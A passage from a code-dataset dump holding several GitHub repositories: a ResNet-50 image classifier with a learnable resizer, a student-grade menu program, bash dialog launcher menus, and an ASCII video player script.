shutting down\"\n ColourOrder.exit_program()\n myBroker.shutdown()\n sys.exit(0)\n #TODO\n #Fotos machen\n '''\n [E] 6107 qitype.dynamicobject: \tALPythonModule::execute\n\tcalling ColourOrder.onColorDetected\n <type 'exceptions.TypeError'>\n 'NoneType' object has no attribute '__getitem__'\n\n '''\n\n\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 1 |
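The pointing geometry in point_at_circle above, condensed into one function for checking the numbers; a sketch under the same assumptions as the file (60.97 degree horizontal field of view, 98 mm shoulder offset, blob x position given as a 0..1 fraction of image width), following the left-arm branch (the right arm mirrors the sign):

    from math import atan2, pi, sin

    def pointing_angle(x_frac, distance_mm, fov_rad=60.97 * pi / 180, dy_shoulder_mm=98.0):
        # Width of the visible horizon at the blob's distance (sine rule, as in the file).
        horizon = 2.0 * distance_mm * sin(fov_rad / 2) / sin(pi / 2 - fov_rad / 2)
        offset = abs(x_frac * horizon - horizon / 2.0)  # blob offset from image centre
        return atan2(offset - dy_shoulder_mm, distance_mm)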
bilzard/resize_network_cv
|
https://github.com/bilzard/resize_network_cv
|
9ab5739b257192f78de2aeb88c335fa9f35cd730
|
93d6d56426f88e0bc4feee593a731fcd62a6f7b4
|
3e1ee6580fd36f776d797ab69a71cd7a849445ce
|
refs/heads/main
| 2023-07-25T05:48:42.084343 | 2021-06-02T06:18:50 | 2021-06-02T06:18:50 | 396,613,190 | 0 | 0 |
Apache-2.0
| 2021-08-16T04:16:08 | 2021-08-14T23:32:33 | 2021-06-02T06:44:32 | null |
[
{
"alpha_fraction": 0.6098265647888184,
"alphanum_fraction": 0.6589595079421997,
"avg_line_length": 33.599998474121094,
"blob_id": "3f57ea383d7fa0975de4de0f09bfcaf8f84fb294",
"content_id": "8c1ce55e82608be9d1296e80df05d8690860512e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 346,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 10,
"path": "/src/models/base_model.py",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "from torchvision.models import resnet50\nimport torch.nn as nn\n\n\ndef get_base_model(in_channels: int, num_classes: int = 10):\n model = resnet50(pretrained=False)\n model.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2,\n padding=3, bias=False)\n model.fc = nn.Linear(2048, num_classes)\n return model\n"
},
{
"alpha_fraction": 0.5613174438476562,
"alphanum_fraction": 0.5620182156562805,
"avg_line_length": 28.72916603088379,
"blob_id": "fffdfe990198d50dca55fb7f5a6e637c3dc351b1",
"content_id": "50df982d9f97549de2657f71250b808ffc4305c2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1427,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 48,
"path": "/src/trainer.py",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "from omegaconf import DictConfig\nimport hydra\n\nimport os\nimport torch\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\nfrom model import Module\nfrom data import DataModule\n\n\[email protected](config_name=\"config\")\ndef main(cfg: DictConfig):\n dm = DataModule(cfg)\n dm.setup()\n model = Module(cfg, dm.val_length)\n\n if cfg.apply_resizer_model:\n path = hydra.utils.to_absolute_path(cfg.trained_path)\n path = os.path.abspath(path)\n path = os.path.join(path, f\"{cfg.data.name}.ckpt\")\n ckpt = torch.load(path)['state_dict']\n state_dict = {}\n for k, v in ckpt.items():\n k = k[k.find('.')+1:]\n state_dict[k] = v\n model.base_model.load_state_dict(state_dict)\n\n cfg = cfg.trainer\n callback = ModelCheckpoint(filename=\"{epoch}-{val_acc}\",\n monitor='val_acc',\n save_last=True,\n mode='max')\n\n trainer = Trainer(gpus=cfg.gpus,\n benchmark=True,\n callbacks=[callback],\n check_val_every_n_epoch=cfg.check_val_every_n_epoch,\n max_epochs=cfg.epochs,\n precision=cfg.precision,\n gradient_clip_val=cfg.gradient_clip_value)\n\n trainer.fit(model, datamodule=dm)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5384893417358398,
"alphanum_fraction": 0.5580050349235535,
"avg_line_length": 39.10144805908203,
"blob_id": "3603acf72f707466cb0cbe2ecbbd560a69508423",
"content_id": "157a320718dba2236448c26ec7f3f159e0181231",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2767,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 69,
"path": "/src/data.py",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "from omegaconf import DictConfig\nfrom hydra.utils import to_absolute_path\nfrom pytorch_lightning import LightningDataModule\n\nimport os\n\nimport torch\nimport torchvision.transforms as T\nfrom torchvision.datasets import ImageFolder\nimport torchvision.io as io\nfrom functools import partial\n\n\nclass DataModule(LightningDataModule):\n def __init__(self, cfg: DictConfig):\n super().__init__()\n # Hydra changes working directory, so change cfg.data.root to\n # reflect this change\n cfg.data.root = to_absolute_path(cfg.data.root)\n cfg.data.root = os.path.abspath(cfg.data.root)\n\n self.cfg = cfg.data\n self.dataset_path = os.path.join(self.cfg.root, self.cfg.name)\n\n valid_names = (\"imagenette2\", \"imagewoof2\")\n if self.cfg.name not in valid_names:\n raise ValueError(f\"Incorrect \\\"data.name: {self.cfg.name}. The \"\n f\"valid options are {valid_names}\")\n\n if cfg.apply_resizer_model:\n image_size = self.cfg.resizer_image_size\n else:\n image_size = self.cfg.image_size\n\n self.image_read_func = partial(io.read_image,\n mode=io.image.ImageReadMode.RGB)\n\n self.train_transform = T.Compose([\n T.Resize((image_size, image_size)),\n T.RandomHorizontalFlip(),\n T.ConvertImageDtype(torch.float32),\n T.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ])\n\n self.test_transform = T.Compose([\n T.Resize((image_size, image_size)),\n T.ConvertImageDtype(torch.float32),\n T.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ])\n\n def setup(self, stage=None):\n self.train_data = ImageFolder(os.path.join(self.dataset_path, 'train'),\n transform=self.train_transform,\n loader=self.image_read_func)\n self.val_data = ImageFolder(os.path.join(self.dataset_path, 'val'),\n transform=self.test_transform,\n loader=self.image_read_func)\n self.val_length = len(self.val_data)\n\n def train_dataloader(self):\n return torch.utils.data.DataLoader(dataset=self.train_data,\n batch_size=self.cfg.batch_size,\n shuffle=True,\n num_workers=self.cfg.num_workers)\n\n def val_dataloader(self):\n return torch.utils.data.DataLoader(dataset=self.val_data,\n batch_size=self.cfg.batch_size,\n num_workers=self.cfg.num_workers)\n"
},
{
"alpha_fraction": 0.6222222447395325,
"alphanum_fraction": 0.6222222447395325,
"avg_line_length": 31.5,
"blob_id": "ad23db44a2fbb1a13441457fb4449735b678f81c",
"content_id": "3b96c947b9b3854ede884dcae530605d36b30443",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 585,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 18,
"path": "/src/models/__init__.py",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "from omegaconf import DictConfig\n\nfrom .base_model import get_base_model\nfrom .resizer import Resizer\n\n\ndef get_model(name: str, cfg: DictConfig):\n if name == \"resizer\":\n return Resizer(cfg)\n elif name == \"base_model\":\n if cfg.apply_resizer_model:\n in_channels = cfg.resizer.out_channels\n else:\n in_channels = cfg.resizer.in_channels\n return get_base_model(in_channels, cfg.data.num_classes)\n else:\n raise ValueError(f\"Incorrect name={name}. The valid options are\"\n \"('resizer', 'base_model')\")\n"
},
{
"alpha_fraction": 0.5506072640419006,
"alphanum_fraction": 0.5552342534065247,
"avg_line_length": 27.816667556762695,
"blob_id": "8e4c62dd74ed692a7348ff4ad9321f1f20f946f6",
"content_id": "ca607ab07af7276c8fd46a5e4cbf322f59a64a08",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1729,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 60,
"path": "/src/model.py",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "from omegaconf import DictConfig\n\nimport torch\nimport torch.nn as nn\nfrom pytorch_lightning import LightningModule\n\nfrom models import get_model\n\n\nclass Module(LightningModule):\n def __init__(self, cfg: DictConfig, val_length):\n super().__init__()\n self.cfg = cfg.trainer\n self.val_length = val_length\n if cfg.apply_resizer_model:\n self.resizer_model = get_model('resizer', cfg)\n else:\n self.resizer_model = None\n\n self.base_model = get_model('base_model', cfg)\n self.loss = nn.CrossEntropyLoss()\n\n def forward(self, x):\n if self.resizer_model is not None:\n x = self.resizer_model(x)\n x = self.base_model(x)\n return x\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n y_hat = self(x)\n loss = self.loss(y_hat, y)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n y_hat = self(x)\n acc = (y_hat.argmax(-1) == y).sum().item()\n return acc\n\n def validation_epoch_end(self, validation_step_outputs):\n acc = 0\n for pred in validation_step_outputs:\n acc += pred\n acc = acc / self.val_length\n self.log('val_acc', acc, on_step=False, on_epoch=True, prog_bar=True)\n\n def configure_optimizers(self):\n optim = torch.optim.SGD(self.parameters(), lr=self.cfg.lr,\n momentum=0.9)\n scheduler = torch.optim.lr_scheduler.StepLR(\n optim, step_size=50, gamma=0.8)\n\n return {\n 'optimizer': optim,\n 'lr_scheduler': {\n 'scheduler': scheduler,\n 'interval': 'epoch',\n }\n }\n"
},
{
"alpha_fraction": 0.7731629610061646,
"alphanum_fraction": 0.7987220287322998,
"avg_line_length": 27.545454025268555,
"blob_id": "72d68f2b52b5606d82597ed063dee202695bcdec",
"content_id": "0cc08bf94a8dc1535a250ca7b1ee08d1519aefa8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 313,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 11,
"path": "/download_data.sh",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "mkdir -p data\n\n# Imagenette install instructions\nwget https://s3.amazonaws.com/fast-ai-imageclas/imagenette2.tgz\ntar -xzf imagenette2.tgz -C data/\nrm imagenette2.tgz\n\n# Imagewoof install instructions\nwget https://s3.amazonaws.com/fast-ai-imageclas/imagewoof2.tgz\ntar -xzf imagewoof2.tgz -C data/\nrm imagewoof2.tgz"
}
] | 6 |
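Taken together, the six files above train a ResNet-50 with an optional learned resizer in front: get_base_model in src/models/base_model.py rebuilds the stem convolution so its input channel count can match the resizer's output, and replaces the classifier head for the 10-class Imagenette/Imagewoof labels. A quick shape check of that helper, assuming torch and torchvision are installed (the dummy batch below is not part of the repository):

import torch
import torch.nn as nn
from torchvision.models import resnet50

def get_base_model(in_channels: int, num_classes: int = 10):
    # Same construction as src/models/base_model.py above.
    model = resnet50(pretrained=False)
    model.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2,
                            padding=3, bias=False)
    model.fc = nn.Linear(2048, num_classes)
    return model

model = get_base_model(in_channels=3, num_classes=10)
x = torch.randn(2, 3, 224, 224)  # dummy batch of two RGB images
print(model(x).shape)            # torch.Size([2, 10])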
rodrigostellitano/ProjectStudyBasic
|
https://github.com/rodrigostellitano/ProjectStudyBasic
|
ace02202549d4cb5f78f831c53cc07b675439eae
|
0033e2d14246a087e5b1ac777ade2386b6a3afba
|
d30c5ff689d6b5682b7e7ca318545e5eafdf2cbf
|
refs/heads/master
| 2021-05-21T21:57:52.146336 | 2020-05-01T17:31:36 | 2020-05-01T17:31:36 | 252,819,056 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5604488849639893,
"alphanum_fraction": 0.5755823850631714,
"avg_line_length": 23.81012725830078,
"blob_id": "e4045449cb0d82a1df6284096b9c5774b6ee8a94",
"content_id": "c527a4ba2a13390773302ecc9ea3fbcdb0cc4fc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5905,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 237,
"path": "/avarage.py",
"repo_name": "rodrigostellitano/ProjectStudyBasic",
"src_encoding": "UTF-8",
"text": "\n\"Faça um Programa que peça as quatro notas de 10 alunos, calcule e armazene num vetor a média de cada aluno, imprima o número de alunos com média maior ou igual a 7.0. \"\n# Menu\n# Inserir aluno\n# Deletar aluno\n# adicionar nota\n# excluir nota\n# media da turma\n\nimport sys, os\n\n# Menu\ndef main_menu():\n print(\"Bem vindo,\\n\")\n print(\"Escolha as opções:\")\n print(\"1. Inserir aluno\")\n print(\"2. Deletar aluno\")\n print(\"3. Listar aluno\")\n print(\"4. Inserir Nota\")\n print(\"5. Média\")\n print(\"\\n0. Quit\")\n choice = input(\" >> \")\n exec_menu(choice)\n\n return\n\n\n# Executa o Menu1\ndef exec_menu(choice):\n os.system('cls')\n ch = choice.lower()\n if ch == '':\n menu_actions['main_menu']()\n else:\n try:\n menu_actions[ch]()\n except KeyError:\n\n print(\"Invalid selection, please try again.\\n\")\n menu_actions['main_menu']()\n return\n\n\n# Inserir o aluno\ndef inserir_aluno():\n os.system('cls')\n\n global indice_aluno\n\n indice_aluno = len(lista_aluno.keys())\n\n nome = input(\"Digite o nome do aluno:\")\n lista_aluno[indice_aluno] = [nome]\n lista_aluno[indice_aluno].insert(1,'A')\n\n print(\"Aluno inserido\")\n print(\"O nome do aluno incluido é: {} e o seu ID é: {}\".format(nome, indice_aluno))\n #indice_aluno = indice_aluno + 1\n\n choice_inserir_aluno = input(\"Deseja adicionar mais aluno?\")\n choice_inserir_aluno.lower()\n # Poderia criar a rotina toda de menu novamente, mas decidi não\n\n if choice_inserir_aluno == 's':\n inserir_aluno()\n if choice_inserir_aluno == 'n':\n main_menu()\n else:\n print(\"Escolha invalida, retornando ao Menu Inicial\")\n main_menu()\n\n\n# Listar Aluno\ndef listar_aluno():\n os.system('cls')\n list_status = []\n\n status = input('Deseja listar os alunos (A)tivos ou (I)nativos?')\n\n for i in lista_aluno.keys():\n list_status.append(lista_aluno[i][1])\n\n if status.upper() in list_status:\n listar_aluno_total(status)\n else:\n res = \"Ativos\" if status.upper() == 'A' else \"Inativos\"\n print(\"A lista não possui alunos \" + res)\n\n input(\"Pressione <enter> para continuar\")\n main_menu()\n\n# Deletar Aluno\ndef deletar_aluno():\n listar_aluno_total('A')\n list_status = []\n\n for i in lista_aluno.keys():\n list_status.append(lista_aluno[i][1])\n\n if 'A' not in list_status:\n print(\"Não possui alunos ativos no Sistema para Deletar\")\n main_menu()\n\n id_delet = input('Escolha uma ID - CASO NÃO DESEJE DELETAR NINGUÉM DIGITE Z ')\n\n if id_delet.lower() == 'z':\n main_menu()\n\n\n if int(id_delet) in lista_aluno.keys() and lista_aluno[int(id_delet)][1] == 'A':\n lista_aluno[int(id_delet)][1] = 'I'\n else:\n print('ID NÃO LOCALIZADA')\n deletar_aluno()\n\n input(\"Digite <enter> para continuar\")\n main_menu()\n\n# Inserir nota\n#LAYOUT {'id': ['nome', stats, 'nota1', 'nota2', 'nota3', 'media', ]}\n\ndef inserir_nota():\n os.system('cls')\n #list_status = []\n listar_aluno_total('A')\n\n id_aluno = input(\"Selecione o ID que deseja adicionar a nota - CASO NÃO DESEJE INSERIR NOTA DIGITE Z \")\n\n if id_aluno.isnumeric():\n id_aluno = int(id_aluno)\n\n if id_aluno in lista_aluno.keys() and lista_aluno[id_aluno][1] == \"A\":\n n1 = float(input(\"Insira a nota 1: \"))\n lista_aluno[id_aluno].insert(2, n1)\n n2 = float(input(\"Insira a nota 2: \"))\n lista_aluno[id_aluno].insert(3, n2)\n n3 = float(input(\"Insira a nota 3: \"))\n lista_aluno[id_aluno].insert(4, n3)\n media = (n1 + n2 + n3) / 3\n lista_aluno[int(id_aluno)].insert(5, media)\n\n resultado = format(lista_aluno[id_aluno][5],'.2f')\n print(\"Sua média 
é: \" + str(resultado))\n input(\"Pressione <Enter> para continuar\")\n inserir_nota()\n else:\n print(\"Aluno Inativo, tente outro ID\")\n input(\"Pressione <Enter> para voltar\")\n inserir_nota()\n #teste\n elif id_aluno.lower() == 'z':\n main_menu()\n\n#Opção de listar alunos\n\ndef listar_aluno_total(status):\n if len(lista_aluno) == 0:\n print('Lista Vazia!')\n main_menu()\n\n\n for key in lista_aluno.keys():\n\n if lista_aluno[key][1] == status.upper():\n print(str(key) + '- ' + lista_aluno[key][0])\n\n\ndef media():\n\n listar_aluno_total(\"A\")\n\n\n porcentagem_media = input(\"Informe a media (1 - 10) - CASO NÃO DESEJE INSERIR NOTA DIGITE Z \")\n\n for key in lista_aluno:\n if float(porcentagem_media) > lista_aluno[key][5] and lista_aluno[key][1] == 'A':\n print(\"Aluno: \" + lista_aluno[key][0] + '| Media: ' + str(lista_aluno[key][5]))\n\n\n media()\n if porcentagem_media.lower() == 'z':\n main_menu()\n\ndef exit():\n sys.exit()\n\n\ndef back():\n menu_actions['main_menu']()\n\n\n# Lista do menu\nmenu_actions = {\n 'main_menu': main_menu,\n '1': inserir_aluno,\n '2': deletar_aluno,\n '3': listar_aluno,\n '4': inserir_nota,\n '5': media,\n '9': back,\n '0': exit,\n}\n\n#LAYOUT {'id': ['nome', stats, 'nota1', 'nota2', 'nota3', 'media']}\n\nlista_aluno = {\n 1: ['Rodrigo', 'A', 10, 10, 10,10 ],\n 2: ['Rodrigo2', 'I', 5, 5, 5, 5],\n 3: ['Rodrigo3', \"A\", 3,2,1,2],\n 4: ['Rodrigo4', \"A\", 3,2,1,2]\n}\n\nindice_aluno = 1\nindice_nota = 1\n\nmain_menu()\n\n\n\n'turma_um.pesquisar_aluno(\"Rodrigo\")'\n\n\nclass Turma():\n aluno_nome = list()\n\n def inserir_aluno(self, nome):\n self.aluno_nome.append(nome)\n\n def listar_aluno(self):\n print(self.aluno_nome)\n\n def pesquisar_aluno(self, nome):\n try:\n pos = self.aluno_nome.index(nome)\n\n print(\"O nome procurado foi: {} e o indice dele é: {} \".format(self.aluno_nome[pos], pos))\n except ValueError:\n print(\"Nome não localizado na lista\")\n"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 22,
"blob_id": "cc667496b5fc854a91f47ea5e3d6df0b70d1fd04",
"content_id": "3e9920223840ec56b140b50ceda9f3112995a740",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 1,
"path": "/README.md",
"repo_name": "rodrigostellitano/ProjectStudyBasic",
"src_encoding": "UTF-8",
"text": "#Aprendendo GIT JUNTO!"
}
] | 2 |
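avarage.py above dispatches menu choices through the menu_actions dict rather than an if/elif ladder: the user's input string is the key, the handler function is the value, and a KeyError doubles as input validation. The pattern in isolation (handler names here are illustrative, not taken from the file):

def insert_student():
    print("insert chosen")

def delete_student():
    print("delete chosen")

# One table maps raw input straight to the handler that serves it.
menu_actions = {"1": insert_student, "2": delete_student}

choice = "1"
try:
    menu_actions[choice]()  # single lookup, single call
except KeyError:
    print("Invalid selection, please try again.")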
RockZombie123/PythonProjects
|
https://github.com/RockZombie123/PythonProjects
|
faa871102b6652a7ac71e15d498f45837d99d680
|
00b8b41f519e5b835fda828d4264acfcdc473ce3
|
b2ccd5f86d2547971de6234bf028876702ad879e
|
refs/heads/main
| 2023-09-02T05:50:52.937242 | 2021-11-18T03:09:53 | 2021-11-18T03:09:53 | 422,275,084 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.45470085740089417,
"alphanum_fraction": 0.48376068472862244,
"avg_line_length": 21.745098114013672,
"blob_id": "743094837bb046d8c5ed1b3da9ee366ad35b972e",
"content_id": "b4138cd4ea2e883da0d8a6b4a7e337d48807e470",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 51,
"path": "/root.sh",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nHEIGHT=15\nWIDTH=40\nCHOICE_HEIGHT=4\nBACKTITLE=\"< Applications\"\nTITLE=\"Root\"\nMENU=\"Choose one of the following files:\"\n\nOPTIONS=(1 \"/home/s29sshankar/validation2.py\"\n 2 \"/home/s29sshankar/PythonProjects/simulator.py\"\n 3 \"/home/s29sshankar/menu.sh\"\n\t 4 \"/home/s29sshankar/root.sh\"\n\t 5 \"/home/s29sshankar/apps.sh\")\n\n\nCHOICE=$(dialog --clear \\\n --backtitle \"$BACKTITLE\" \\\n --title \"$TITLE\" \\\n --menu \"$MENU\" \\\n $HEIGHT $WIDTH $CHOICE_HEIGHT \\\n \"${OPTIONS[@]}\" \\\n 2>&1 >/dev/tty)\n\nclear\ncase $CHOICE in\n 1)\n echo \"You chose Option 1\"\n nano validation2.py\n ;;\n 2)\n echo \"You chose Option 2\"\n cd PythonProjects\n\t nano simulator.py\n ;;\n 3)\n echo \"You chose Option 3\"\n\t chmod +x menu.sh\n\t nano menu.sh\n\t ;;\n\t4)\n echo \"You chose Option 4\"\n chmod +x root.sh\n nano root.sh\n ;;\n 5)\n echo \"You chose Option 5\"\n chmod +x apps.sh\n nano apps.sh\n ;;\nesac \n"
},
{
"alpha_fraction": 0.4419191777706146,
"alphanum_fraction": 0.46212121844291687,
"avg_line_length": 19.30769157409668,
"blob_id": "0ca647dea81b1b2c2cbe8e26f9026f892647319d",
"content_id": "0cd9eee6648dac4584641c65753e818cb6857f5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 792,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 39,
"path": "/games.sh",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nHEIGHT=15\nWIDTH=40\nCHOICE_HEIGHT=4\nBACKTITLE=\"< Menu\"\nTITLE=\"Games\"\nMENU=\"Choose one of the following Games:\"\n\nOPTIONS=(1 \"Snake\"\n 2 \"Simon Says\"\n 3 \"Other games\")\n\nCHOICE=$(dialog --clear \\\n --backtitle \"$BACKTITLE\" \\\n --title \"$TITLE\" \\\n --menu \"$MENU\" \\\n $HEIGHT $WIDTH $CHOICE_HEIGHT \\\n \"${OPTIONS[@]}\" \\\n 2>&1 >/dev/tty)\n\nclear\ncase $CHOICE in\n 1)\n echo \"You chose Option 1\"\n\t chmod +x snake.sh\n ./snake.sh\n ;;\n 2)\n echo \"You chose Option 2\"\n\t chmod +x simon.sh\n ./simon.sh\n ;;\n 3)\n\t echo \"You chose Option 3\"\n\t chmod +x othergames.sh\n\t ./othergames.sh\n\t ;;\nesac\n"
},
{
"alpha_fraction": 0.442827433347702,
"alphanum_fraction": 0.46569645404815674,
"avg_line_length": 16.490909576416016,
"blob_id": "c28a72edc823117eb15bb28925516492e6e8df91",
"content_id": "f9babf99b24dda23caeba80e871c811def485210",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 962,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 55,
"path": "/menu.sh",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nHEIGHT=15\nWIDTH=40\nCHOICE_HEIGHT=4\nBACKTITLE=\"< Quit\"\nTITLE=\"Menu\"\nMENU=\"Choose one of the following categories:\"\n\nOPTIONS=(1 \"Applications\"\n 2 \"Root\"\n\t 3 \"Help\"\n\t 4 \"Credits\"\n 5 \"Games\")\n\nCHOICE=$(dialog --clear \\\n --backtitle \"$BACKTITLE\" \\\n --title \"$TITLE\" \\\n --menu \"$MENU\" \\\n $HEIGHT $WIDTH $CHOICE_HEIGHT \\\n \"${OPTIONS[@]}\" \\\n 2>&1 >/dev/tty)\n\nclear\ncase $CHOICE in\n 1)\n echo \"You chose Option 1\"\n\t chmod +x apps.sh\n\t ./apps.sh\n ;;\n 2)\n echo \"You chose Option 2\"\n\t chmod +x root.sh\n\t ./root.sh\n ;;\n\n\n\t3)\n\t echo \"You chose Option 3\"\n\t chmod +x help.sh\n\t ./help.sh\n\t ;;\n\t\n\t4)\n\t echo \"You chose Option 4\"\n\t chmod +x credits.sh\n\t ./credits.sh\n\t ;;\n\t\n 5)\n echo \"You chose Option 4\"\n\t chmod +x games.sh\n\t ./games.sh\n ;;\nesac\n"
},
{
"alpha_fraction": 0.5020492076873779,
"alphanum_fraction": 0.5297130942344666,
"avg_line_length": 21.18181800842285,
"blob_id": "b6b9a8c483100913a361c6283b3de4714f745e6d",
"content_id": "dcd494c281bb448d88c4a58722f1ad1b913a190d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 976,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 44,
"path": "/apps.sh",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nHEIGHT=15\nWIDTH=40\nCHOICE_HEIGHT=4\nBACKTITLE=\"< Menu\"\nTITLE=\"Applications\"\nMENU=\"Choose one of the following applications:\"\n\nOPTIONS=(1 \"Terminal\"\n 2 \"Music Player\"\n\t 3 \"Update\"\n 4 \"ASCII Video Player\")\n\nCHOICE=$(dialog --clear \\\n --backtitle \"$BACKTITLE\" \\\n --title \"$TITLE\" \\\n --menu \"$MENU\" \\\n $HEIGHT $WIDTH $CHOICE_HEIGHT \\\n \"${OPTIONS[@]}\" \\\n 2>&1 >/dev/tty)\n\nclear\ncase $CHOICE in\n 1)\n echo \"You chose Option 1\"\n\t cd PythonProjects/\n python3 simulator.py\n ;;\n 2)\n echo \"You chose Option 2\"\n\t python3 musicplayer.py\n ;;\n\n\t3)\n\t echo \"Downloading from: https://github.com/RockZombie123/PythonProjects.git\"\n\t git clone https://github.com/RockZombie123/PythonProjects.git\n\t ;;\n\n 4)\n echo \"You chose Option 4\"\n\t python3 asciivideo.py\n ;;\nesac\n"
},
{
"alpha_fraction": 0.5987846851348877,
"alphanum_fraction": 0.6143866181373596,
"avg_line_length": 32.63536071777344,
"blob_id": "ad44a0656211fcf0822eae3384b2457e80c72ef1",
"content_id": "d5f3a6f675907bc8aca490286f670b0ff1aaf322",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6089,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 181,
"path": "/asciivideo.py",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "\nimport cv2\nimport time\nimport sys\nfrom PIL import Image\nfrom multiprocessing import Process\nimport os\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport pygame\nimport fpstimer\nimport moviepy.editor as mp\n\n\nASCII_CHARS = [\"@\", \"#\", \"S\", \"%\", \"?\", \"*\", \"+\", \";\", \":\", \",\", \" \"]\nframe_size = 150\nframe_interval = 1.0 / 30.75\n\nASCII_LIST = []\n\n\ndef play_audio(path):\n pygame.init()\n pygame.mixer.pre_init(44100, -16, 2, 2048)\n pygame.mixer.init()\n pygame.mixer.music.load(path)\n pygame.mixer.music.play()\n\n\ndef play_video(total_frames):\n # os.system('color F0')\n os.system('mode 150, 500')\n\n timer = fpstimer.FPSTimer(30)\n\n start_frame = 0\n\n for frame_number in range(start_frame, total_frames):\n sys.stdout.write(\"\\r\" + ASCII_LIST[frame_number])\n timer.sleep()\n\n # os.system('color 07')\n\n\n# Extract frames from video\ndef extract_transform_generate(video_path, start_frame, number_of_frames=1000):\n capture = cv2.VideoCapture(video_path)\n capture.set(1, start_frame) # Points cap to target frame\n current_frame = start_frame\n frame_count = 1\n ret, image_frame = capture.read()\n while ret and frame_count <= number_of_frames:\n ret, image_frame = capture.read()\n try:\n image = Image.fromarray(image_frame)\n ascii_characters = pixels_to_ascii(greyscale(resize_image(image))) # get ascii characters\n pixel_count = len(ascii_characters)\n ascii_image = \"\\n\".join(\n [ascii_characters[index:(index + frame_size)] for index in range(0, pixel_count, frame_size)])\n\n ASCII_LIST.append(ascii_image)\n\n except Exception as error:\n continue\n\n progress_bar(frame_count, number_of_frames)\n\n frame_count += 1 # increases internal frame counter\n current_frame += 1 # increases global frame counter\n\n capture.release()\n\n\n# Progress bar code is courtesy of StackOverflow user: Aravind Voggu.\n# Link to thread: https://stackoverflow.com/questions/6169217/replace-console-output-in-python\ndef progress_bar(current, total, barLength=25):\n progress = float(current) * 100 / total\n arrow = '#' * int(progress / 100 * barLength - 1)\n spaces = ' ' * (barLength - len(arrow))\n sys.stdout.write('\\rProgress: [%s%s] %d%% Frame %d of %d frames' % (arrow, spaces, progress, current, total))\n\n\n# Resize image\ndef resize_image(image_frame):\n width, height = image_frame.size\n aspect_ratio = (height / float(width * 2.5)) # 2.5 modifier to offset vertical scaling on console\n new_height = int(aspect_ratio * frame_size)\n resized_image = image_frame.resize((frame_size, new_height))\n # print('Aspect ratio: %f' % aspect_ratio)\n # print('New dimensions %d %d' % resized_image.size)\n return resized_image\n\n\n# Greyscale\ndef greyscale(image_frame):\n return image_frame.convert(\"L\")\n\n\n# Convert pixels to ascii\ndef pixels_to_ascii(image_frame):\n pixels = image_frame.getdata()\n characters = \"\".join([ASCII_CHARS[pixel // 25] for pixel in pixels])\n return characters\n\n\n# Open image => Resize => Greyscale => Convert to ASCII => Store in text file\ndef ascii_generator(image_path, start_frame, number_of_frames):\n current_frame = start_frame\n while current_frame <= number_of_frames:\n path_to_image = image_path + '/BadApple_' + str(current_frame) + '.jpg'\n image = Image.open(path_to_image)\n 